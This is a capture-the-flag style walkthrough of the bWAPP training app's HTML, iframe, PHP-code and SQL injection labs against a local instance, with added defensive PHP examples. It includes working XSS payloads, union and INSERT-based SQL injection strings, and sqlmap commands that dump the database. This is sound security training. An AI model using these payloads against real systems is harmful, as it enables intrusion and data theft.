bWAPP
- HTML Injection - Reflected (GET)
- HTML Injection - Reflected (POST)
- HTML Injection - Reflected (URL)
- HTML Injection - Stored (Blog)
- iFrame Injection
- PHP Code Injection
- SQL Injection (GET/Search)
- SQL Injection (GET/Select)
- SQL Injection (POST/Search)
- SQL Injection (POST/Select)
- SQL Injection (AJAX/JSON/jQuery)
- SQL Injection - Stored (Blog)
- SQL Injection - Stored (SQLite)
- SQL Injection - Stored (User-Agent)
- SQL Injection - Blind - Boolean-Based
- SQL Injection - Blind - Time-Based
HTML Injection - Reflected (GET)
low
Start by entering arbitrary text and check what is reflected.
Next, enter First name: <p>111</p>; Last name: 1
The reflected output shows the markup rendered, so the input is parsed as HTML.
Try JavaScript: First name: <script>alert(document.cookie)</script>; Last name: 1
An alert pops up showing the cookie.
medium
Enter the same JavaScript: First name: <script>alert(document.cookie)</script>; Last name: 1
It is not executed; the page source shows the angle brackets have been replaced.
URL-encode the angle brackets instead and submit %3cscript%3ealert(document.cookie)%3c/script%3e: the alert appears.
high
Enter <script>alert(document.cookie)</script>: it is not parsed.
Capturing the traffic shows that both the angle brackets and the parentheses are encoded.
Source:
function xss_check_3($data, $encoding = "UTF-8")
{
// htmlspecialchars - converts special characters to HTML entities
// '&' (ampersand) becomes '&amp;'
// '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
// "'" (single quote) becomes '&#039;' (or '&apos;') only when ENT_QUOTES is set
// '<' (less than) becomes '&lt;'
// '>' (greater than) becomes '&gt;'
return htmlspecialchars($data, ENT_QUOTES, $encoding);
}
Every predefined special character is converted to an HTML entity, so this level is safe.
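As an added illustration (my code, not bWAPP's) of why the medium-level bypass above works: a filter that replaces angle brackets before the value is URL-decoded can be passed with an encoded payload, while decoding first and then encoding with the same htmlspecialchars() call that xss_check_3 uses closes the gap. That the medium level decodes after filtering is an assumption drawn from the behaviour described in the post; the function names are mine.

```php
<?php
// Added example, not bWAPP code. Models the medium-level behaviour seen above
// (assumption): angle brackets are replaced, then the value is URL-decoded.

// Flawed order: sanitise first, decode second. Decoding reintroduces the brackets
// that the replacement never saw.
function filter_then_decode(string $input): string
{
    $replaced = str_replace(['<', '>'], ['&lt;', '&gt;'], $input);
    return urldecode($replaced);
}

// Correct order: canonicalise (decode) first, then encode for the HTML context
// with the same call xss_check_3 uses.
function decode_then_encode(string $input): string
{
    $canonical = urldecode($input);
    return htmlspecialchars($canonical, ENT_QUOTES, 'UTF-8');
}

// True when the string still carries raw tag delimiters.
function has_raw_tags(string $html): bool
{
    return strpbrk($html, '<>') !== false;
}

// Both inputs are the ones used in the post.
$plain   = '<script>alert(document.cookie)</script>';
$encoded = '%3cscript%3ealert(document.cookie)%3c/script%3e';

foreach (['plain' => $plain, 'url-encoded' => $encoded] as $label => $input) {
    printf("%-12s filter-then-decode raw tags: %s | decode-then-encode raw tags: %s\n",
        $label,
        has_raw_tags(filter_then_decode($input)) ? 'yes' : 'no',
        has_raw_tags(decode_then_encode($input)) ? 'yes' : 'no');
}
```

Run it with `php` on the command line; only the URL-encoded input through filter_then_decode() still carries raw tags, which is the ordering mistake the medium level exhibits and the high level avoids.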
HTML Injection - Reflected (POST)
Same as the previous level, except the parameter is sent by POST instead of GET.
HTML Injection - Reflected (URL)
low
Try building the payload in the URL.
Constructing the XSS directly in the address bar does not work: the angle brackets < > get encoded.
Modifying the URL in an intercepting proxy instead succeeds.
medium & high
Source:
switch($_COOKIE["security_level"])
{
case "0" :
// $url = "http://" . $_SERVER["HTTP_HOST"] . urldecode($_SERVER["REQUEST_URI"]);
$url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
break;
case "1" :
$url = "<script>document.write(document.URL)</script>";
break;
case "2" :
$url = "http://" . $_SERVER["HTTP_HOST"] . xss_check_3($_SERVER["REQUEST_URI"]);
break;
default :
// $url = "http://" . $_SERVER["HTTP_HOST"] . urldecode($_SERVER["REQUEST_URI"]);
$url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
break;
}
Safe; no bypass found.
HTML Injection - Stored (Blog)
low
Enter arbitrary text and check what is displayed.
Enter <h1>111</h1>: the output shows the markup rendered, so the input is parsed.
Enter <script>alert(document.cookie)</script>: the alert pops up with the cookie.
medium & high
Source:
switch($_COOKIE["security_level"])
{
case "0" :
$data = sqli_check_3($link, $data);
break;
case "1" :
$data = sqli_check_3($link, $data);
// $data = xss_check_4($data);
break;
case "2" :
$data = sqli_check_3($link, $data);
// $data = xss_check_3($data);
break;
default :
$data = sqli_check_3($link, $data);
break;
}
function sqli_check_3($link, $data)
{
return mysqli_real_escape_string($link, $data);
}
mysqli_real_escape_string() escapes the special characters in a string for use in an SQL statement; it is an SQL escaping function, not an HTML encoder.
iFrame Injection
IFRAME is an HTML tag: a document inside a document, or a floating frame. The iframe element creates an inline frame that embeds another document.
Source:
function xss($data)
{
switch($_COOKIE["security_level"])
{
case "0" :
$data = no_check($data);
break;
case "1" :
$data = xss_check_4($data);
break;
case "2" :
$data = xss_check_3($data);
break;
default :
$data = no_check($data);
break;
}
return $data;
}
function xss_check_3($data, $encoding = "UTF-8")
{
// htmlspecialchars - converts special characters to HTML entities
// '&' (ampersand) becomes '&amp;'
// '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
// "'" (single quote) becomes '&#039;' (or '&apos;') only when ENT_QUOTES is set
// '<' (less than) becomes '&lt;'
// '>' (greater than) becomes '&gt;'
return htmlspecialchars($data, ENT_QUOTES, $encoding);
}
function xss_check_4($data)
{
// addslashes - returns a string with backslashes before characters that need to be quoted in database queries etc.
// These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
// Do NOT use this for XSS or HTML validations!!!
return addslashes($data);
}
low
Modify ParamUrl directly: http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=https://www.baidu.com&ParamWidth=250&ParamHeight=250
medium
Source:
function xss_check_4($data)
{
// addslashes - returns a string with backslashes before characters that need to be quoted in database queries etc.
// These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
// Do NOT use this for XSS or HTML validations!!!
return addslashes($data);
}
In PHP, addslashes() prepends a backslash to certain predefined characters in the input string.
if($_COOKIE["security_level"] == "1" || $_COOKIE["security_level"] == "2")
{
?>
<iframe frameborder="0" src="robots.txt" height="<?php echo xss($_GET["ParamHeight"])?>" width="<?php echo xss($_GET["ParamWidth"])?>"></iframe>
<?php
}
else
{
?>
<iframe frameborder="0" src="<?php echo xss($_GET["ParamUrl"])?>" height="<?php echo xss($_GET["ParamHeight"])?>" width="<?php echo xss($_GET["ParamWidth"])?>"></iframe>
<?php
}
?>
Changing the value of ParamUrl has no effect at this level, so work from the other end. From the code above, inserting </iframe> after the width value closes the preceding tag, and the XSS can follow it:
http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250"></iframe><script>alert(/xss/)</script>&ParamHeight=250
high
Source:
function xss_check_3($data, $encoding = "UTF-8")
{
// htmlspecialchars - converts special characters to HTML entities
// '&' (ampersand) becomes '&amp;'
// '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
// "'" (single quote) becomes '&#039;' (or '&apos;') only when ENT_QUOTES is set
// '<' (less than) becomes '&lt;'
// '>' (greater than) becomes '&gt;'
return htmlspecialchars($data, ENT_QUOTES, $encoding);
}
htmlspecialchars converts the predefined characters (&, ', ", <, >) to HTML entities; this cannot be bypassed, so the level is safe.
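As an added example (my code, not bWAPP's) tying the medium and high levels of this section to the stored-blog code earlier, which applies only sqli_check_3/mysqli_real_escape_string: SQL-style escaping and HTML encoding are different transformations. The block assembles the iframe width attribute the way iframei.php concatenates it and pushes the ParamWidth value from above through addslashes() (the backslash-escaping family that xss_check_4 and mysqli_real_escape_string belong to) and through htmlspecialchars(); the helper names are mine.

```php
<?php
// Added example, not bWAPP code: SQL-style escaping versus HTML encoding.

// What the medium level (xss_check_4) applies. mysqli_real_escape_string, used by
// sqli_check_3 in the stored blog, backslash-escapes a similar character set and
// shares the weakness shown here.
function sql_style_escape(string $data): string
{
    return addslashes($data);
}

// What the high level (xss_check_3) applies.
function html_encode(string $data): string
{
    return htmlspecialchars($data, ENT_QUOTES, 'UTF-8');
}

// Assembles the tag the same way iframei.php concatenates xss($_GET["ParamWidth"]).
function iframe_width_attr(string $width, callable $sanitiser): string
{
    return '<iframe frameborder="0" src="robots.txt" width="' . $sanitiser($width) . '"></iframe>';
}

// Counts tag openers in the markup; the template itself contributes exactly two
// (<iframe and </iframe>), so anything above that came from the parameter.
// An HTML parser does not treat a backslash as an escape character, so the
// backslash addslashes puts before the quote does not keep it inside the attribute.
function injected_tag_count(string $markup): int
{
    return substr_count($markup, '<') - 2;
}

$attr_payload = '250"></iframe><script>alert(/xss/)</script>';   // ParamWidth value from the post
$body_payload = '<script>alert(document.cookie)</script>';       // stored-blog input from the post

foreach (['addslashes' => 'sql_style_escape', 'htmlspecialchars' => 'html_encode'] as $name => $fn) {
    $markup = iframe_width_attr($attr_payload, $fn);
    printf("%-16s injected tags in attribute context: %d\n", $name, injected_tag_count($markup));
    printf("%-16s raw tags left in body context:      %d\n", $name, substr_count($fn($body_payload), '<'));
}
```

The addslashes() row reports injected tags in both contexts, the htmlspecialchars() row reports zero in both; that difference is why the stored-blog medium and high levels, which only escape for SQL, still render the injected script.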
PHP Code Injection
low
Clicking "message" shows "test".
The URL changes from http://127.0.0.1/bWAPP/bWAPP/phpi.php
to http://127.0.0.1/bWAPP/bWAPP/phpi.php?message=test
Changing the message value to http://127.0.0.1/bWAPP/bWAPP/phpi.php?message=phpinfo()
prints the PHP version information.
<div id="main">
<h1>PHP Code Injection</h1>
<p>This is just a test page, reflecting back your <a href="<?php echo($_SERVER["SCRIPT_NAME"]);?>?message=test">message</a>...</p>
<?php
if(isset($_REQUEST["message"]))
{
// If the security level is not MEDIUM or HIGH
if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")
{
?>
<p><i><?php @eval ("echo " . $_REQUEST["message"] . ";");?></i></p>
<?php // Low level: the message is passed straight to eval() and echoed ?>
<?php
}
// If the security level is MEDIUM or HIGH
else
{
?>
<p><i><?php echo htmlspecialchars($_REQUEST["message"], ENT_QUOTES, "UTF-8");;?></i></p>
<?php
}
}
?>
</div>
Looking at the source: the low level passes message straight to eval(), while medium and high pass it through htmlspecialchars().
SQL Injection (GET/Search)
low
' or 1=1 --
' order by 7 --
' union select 1,2,3,4,5,6,7 --
Columns 2, 3, 4 and 5 are displayed.
' union select 1,user(),database(),4,5,6,7 --
SQL Injection (GET/Select)
low
movie=1 and 1=1 &action=go (normal output)
movie=1 and 1=2 &action=go (error)
movie=1 order by 7 &action=go
movie=0 union select 1,2,3,4,5,6,7 &action=go (displayed columns: 2, 3, 4, 5)
movie=0 union select 1,user(),database(),4,5,6,7 &action=go
medium & high
Source:
function sqli($data)
{
switch($_COOKIE["security_level"])
{
case "0" :
$data = no_check($data);
break;
case "1" :
$data = sqli_check_2($data);
break;
default :
$data = no_check($data);
break;
}
return $data;
}
function sqli_check_1($data)
{
return addslashes($data);
}
function sqli_check_2($data)
{
return mysql_real_escape_string($data);
}
This is integer-based injection: the value is not quoted in the query, so the defences aimed at string injection have no effect.
Same as low.
SQL Injection (POST/Search)
low
Same as SQL Injection (GET/Search).
medium & high
switch($_COOKIE["security_level"])
{
case "0" :
$data = no_check($data);
break;
case "1" :
$data = sqli_check_1($data);
break;
case "2" :
$data = sqli_check_2($data);
break;
default :
$data = no_check($data);
break;
}
function sqli_check_1($data)
{
return addslashes($data);
}
function sqli_check_2($data)
{
return mysql_real_escape_string($data);
}
Medium and high use addslashes() and mysql_real_escape_string() respectively as the defence.
SQL Injection (POST/Select)
low
movie=1 and 1=1 &action=go
movie=1 order by 7&action=go
movie=0 union select 1,2,3,4,5,6,7 &action=go
movie=0 union select 1,user(),database(),4,5,6,7 &action=go
SQL Injection (AJAX/JSON/jQuery)
Introduction
AJAX is a technique for building fast, dynamic web pages. By exchanging small amounts of data with the server in the background, AJAX lets a page update asynchronously, so part of the page can be refreshed without reloading the whole page.
AJAX = Asynchronous JavaScript and XML
low
<script>
$("#title").keyup(function(){
// Searches for a movie title
var search = {title: $("#title").val()};
// AJAX call
$.getJSON("sqli_10-2.php", search, function(data){
init_table();
// Constructs the table from the JSON data
var total = 0;
$.each(data, function(key, val){
total++;
$("#table_yellow tr:last").after("<tr><td>" + val.title + "</td><td align='center'>" + val.release_year + "</td><td>" + val.main_character + "</td><td align='center'>" + val.genre + "</td><td align='center'><a href='http://www.imdb.com/title/" + val.imdb + "' target='_blank'>Link</a></td></tr>");
});
// Empty result
if (total == 0)
{
$("#table_yellow tr:last").after("<tr height='30'><td colspan='5' width='580'>No movies were found!</td></tr>");
}
})
});
</script>
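As an added example (my code, not bWAPP's), here is the server side that the GET/Search, GET/Select and AJAX pages above would need to be safe: bound parameters for the title search, integer validation plus PDO::PARAM_INT for the movie id (the integer-injection point made in the GET/Select section), and JSON output whose HTML metacharacters are escaped so the jQuery code above, which concatenates the fields into table rows, never receives raw tags. It runs offline against an in-memory SQLite database filled with constructed rows; the column names follow the JSON fields the jQuery reads and are an assumption about bWAPP's schema.

```php
<?php
// Added example, not bWAPP code: the search / select / JSON logic behind the
// GET/Search, GET/Select and AJAX pages, rewritten with bound parameters.
// Runs against an in-memory SQLite database filled with constructed rows; the
// column names follow the JSON fields the jQuery code reads (assumed schema).

function open_sample_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT, release_year TEXT,
               main_character TEXT, genre TEXT, imdb TEXT)');
    $ins = $db->prepare('INSERT INTO movies (title, release_year, main_character, genre, imdb)
                         VALUES (?, ?, ?, ?, ?)');
    $ins->execute(['Iron Man', '2008', 'Tony Stark', 'action', 'tt0371746']);
    // Constructed row whose fields contain HTML and a quote on purpose.
    $ins->execute(['<b>Evil</b> & "Co"', '2020', "O'Brien", 'horror', 'tt0000000']);
    return $db;
}

// String parameter (title search). The value is bound, never concatenated, so a
// quote in it is data; % and _ are escaped so the user cannot widen the LIKE.
function search_movies(PDO $db, string $title): array
{
    $pattern = '%' . strtr($title, ['\\' => '\\\\', '%' => '\%', '_' => '\_']) . '%';
    $stmt = $db->prepare("SELECT title, release_year, main_character, genre, imdb
                          FROM movies WHERE title LIKE ? ESCAPE '\\'");
    $stmt->execute([$pattern]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Integer parameter (movie id). Escaping does nothing for an unquoted number, so
// the value is validated as an integer and bound as one.
function select_movie(PDO $db, string $movie): ?array
{
    $id = filter_var($movie, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT title, release_year, main_character, genre, imdb
                          FROM movies WHERE id = ?');
    $stmt->bindValue(1, $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// JSON for the AJAX page. The HEX flags turn <, >, &, ' and " into \uXXXX escapes,
// so a client that concatenates the fields into HTML still receives no raw tags.
function movies_json(array $rows): string
{
    return json_encode($rows, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

$db = open_sample_db();
echo "search with quote payload: ", movies_json(search_movies($db, "' or 1=1 -- ")), "\n";
echo "search for Evil:           ", movies_json(search_movies($db, 'Evil')), "\n";
echo "select with union payload: ", var_export(select_movie($db, '0 union select 1,2,3,4,5,6,7'), true), "\n";
echo "select id 1:               ", movies_json([select_movie($db, '1')]), "\n";
```

The quote payload matches nothing because the quote is part of the LIKE pattern rather than of the SQL; the union payload is rejected before any query runs because it is not an integer; and the "Evil" row comes back with its <b> tags and quotes as \u003C, \u003E and \u0022 escapes, which the browser's JSON parser turns back into characters that jQuery's string concatenation would still insert as markup, so text() or a DOM-building call remains the right client-side choice.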
SQL Injection - Stored (Blog)
Stored XSS
low
Start by entering <h>11111</h>; it is reflected.
Try the JavaScript <script>alert(/xss/)</script>; the alert appears.
Looking at the source, three parameters are involved.
Code review:
if(isset($_POST["blog"])) // if the blog form was submitted via POST
{
$entry = sqli($_POST["entry"]); // the submitted value is assigned to $entry
$owner = $_SESSION["login"];
if($entry == "")
{
$message = "<font color=\"red\">Please enter some text...</font>";
}
else
{
// the three values inserted into the new blog row (one per column)
$sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" . $entry . "','" . $owner . "')";
$recordset = $link->query($sql);
if(!$recordset)
{
die("Error: " . $link->error . "<br /><br />");
}
// Debugging
// echo $sql;
$message = "<font color=\"green\">The entry was added to our blog!</font>";
}
}
Capture the request with Burp Suite and send it to Repeater.
Set the entry parameter to 1'
An SQL error appears, so this field is injectable.
Note this line: $sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" . $entry . "','" . $owner . "')";
Try entry=1',(select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))#&blog=add
Here 1' closes the quote opened after now(); (select group_concat(table_name) from information_schema.tables where table_schema='bWAPP') is a single expression that becomes the entry value; the ) after it closes the VALUES list. The page then reports success, which means the injection worked, and # comments out everything that follows.
medium & high
Looking at the source, escaping functions of the addslashes() kind are applied, so the quote character can no longer be used:
function sqli_check_2($data)
{
return mysql_real_escape_string($data);
}
function sqli_check_3($link, $data)
{
return mysqli_real_escape_string($link, $data);
}
Entering <script>alert(/xss/)</script> is still reflected successfully.
SQL Injection - Stored (SQLite)
low
Try the JavaScript <script>alert(/xss/)</script>: the alert appears.
Source:
if(isset($_POST["entry_add"]))
{
$entry = sqli($_POST["entry"]);
$owner = $_SESSION["login"];
if($entry == "")
{
$message = "<font color=\"red\">Please enter some text...</font>";
}
else
{
$db = new PDO("sqlite:".$db_sqlite);
$sql = "SELECT max(id) as id FROM blog;";
$recordset = $db->query($sql);
$row = $recordset->fetch();
$id = $row["id"];
$sql = "INSERT INTO blog (id, date, entry, owner) VALUES (" . ++$id . ",'" . date('Y-m-d', time()) . "','" . $entry . "','" . $owner . "');";
$db->exec($sql);
$message = "<font color=\"green\">The entry was added to our blog!</font>";
}
}
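As an added example (my code, not bWAPP's) covering both the Blog and the SQLite stored levels above: the INSERT rewritten with a prepared statement, an autoincrement id in place of the max(id) + ++$id pattern, and output encoding at read time, which is the step both stored levels lack. It runs offline against an in-memory SQLite database with a constructed blog table whose columns follow the snippets above; the owner value is constructed.

```php
<?php
// Added example, not bWAPP code: the stored-blog INSERT from the Blog and SQLite
// levels rewritten with a prepared statement. Runs against an in-memory SQLite
// database with a constructed blog table (id, date, entry, owner, as above).

function open_blog_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // AUTOINCREMENT replaces the "SELECT max(id)" + ++$id pattern above, which is
    // not atomic: two requests arriving together can compute the same id.
    $db->exec('CREATE TABLE blog (id INTEGER PRIMARY KEY AUTOINCREMENT,
               date TEXT, entry TEXT, owner TEXT)');
    return $db;
}

// entry and owner are bound parameters, so a quote or a sub-select inside them
// is stored as text instead of becoming part of the INSERT.
function add_blog_entry(PDO $db, string $entry, string $owner): int
{
    $stmt = $db->prepare('INSERT INTO blog (date, entry, owner) VALUES (?, ?, ?)');
    $stmt->execute([date('Y-m-d'), $entry, $owner]);
    return (int) $db->lastInsertId();
}

// Output encoding at read time is the step the sqli_check_3-only branch above
// lacks: a stored <script> is rendered as text, not executed.
function render_entries(PDO $db): string
{
    $html = '';
    foreach ($db->query('SELECT date, entry, owner FROM blog ORDER BY id') as $row) {
        $cells = array_map(
            fn (string $v): string => htmlspecialchars($v, ENT_QUOTES, 'UTF-8'),
            [$row['date'], $row['entry'], $row['owner']]
        );
        $html .= '<tr><td>' . implode('</td><td>', $cells) . "</td></tr>\n";
    }
    return $html;
}

$db = open_blog_db();
$owner = 'alice';   // constructed session user
// The two inputs the post submits, stored verbatim:
add_blog_entry($db, "1',(select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))#", $owner);
add_blog_entry($db, '<script>alert(/xss/)</script>', $owner);

foreach ($db->query('SELECT id, entry FROM blog ORDER BY id') as $row) {
    echo $row['id'], ': ', $row['entry'], "\n";
}
echo render_entries($db);
```

Both rows come back as the literal strings that were submitted, with ids 1 and 2 assigned by the database, and the rendered table carries the script as &lt;script&gt; text rather than as a tag.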
SQL Injection - Stored (User-Agent)
low
Clicking download shows the log.
Source:
$ip_address = $_SERVER["REMOTE_ADDR"];
$user_agent = $_SERVER["HTTP_USER_AGENT"];
// Writes the entry into the database
$sql = "INSERT INTO visitors (date, user_agent, ip_address) VALUES (now(), '" . sqli($user_agent) . "', '" . $ip_address . "')";
$recordset = $link->query($sql);
if(!$recordset)
{
die("Error: " . $link->error);
}
// Writes the entry into a text file
$line = "'" . date("y/m/d G.i:s", time()) . "', '" . $ip_address . "', '" . xss($user_agent) . "'" . "\r\n";
$fp = fopen("logs/visitors.txt", "a");
fputs($fp, $line, 200);
fclose($fp);
// Selects all the records
$sql = "SELECT * FROM visitors ORDER by id DESC LIMIT 3";
$recordset = $link->query($sql);
if(!$recordset)
{
die("Error: " . $link->error);
}
Capture the request and modify the User-Agent header.
Sending 1' produces an error.
User-Agent:1',(select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))#
SQL Injection - Blind - Boolean-Based
low
Boolean-based blind: ' or 1=1 #
For how to use sqlmap, see here.
- First obtain the cookie with Burp Suite.
- Enumerate the databases:
python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch --dbs
- Get the current database name:
python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch --current-db
- List all tables in the database:
python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch -D bwapp --tables
- List all columns of the movies table in the bwapp database:
python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch -D bwapp -T movies --columns
- Dump all data in the id column of the movies table:
python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch -D bwapp -T movies -C genre --dump
(The scan takes too long, so I stopped it.)
medium
addslashes() is used.
addslashes() returns a string with a backslash added before each predefined character.
The predefined characters are:
single quote (')
double quote (")
backslash (\)
NUL
Tip: the function can be used to prepare strings for storage in a database and for database query statements.
Note: by default PHP runs addslashes() automatically on all GET, POST and COOKIE data (magic quotes),
so you should not call addslashes() on strings that are already escaped, as that would double-escape them.
In that situation use get_magic_quotes_gpc() to check.
Safe.
high
mysql_real_escape_string() is used.
It escapes the special characters in a string for use in an SQL statement.
The following characters are affected:
\x00
\n
\r
\
'
"
\x1a
On success the function returns the escaped string; on failure it returns false.
Safe.
SQL Injection - Blind - Time-Based
low
- Enumerate the databases:
python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_15.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch --dbs
Use sqlmap as in the steps above.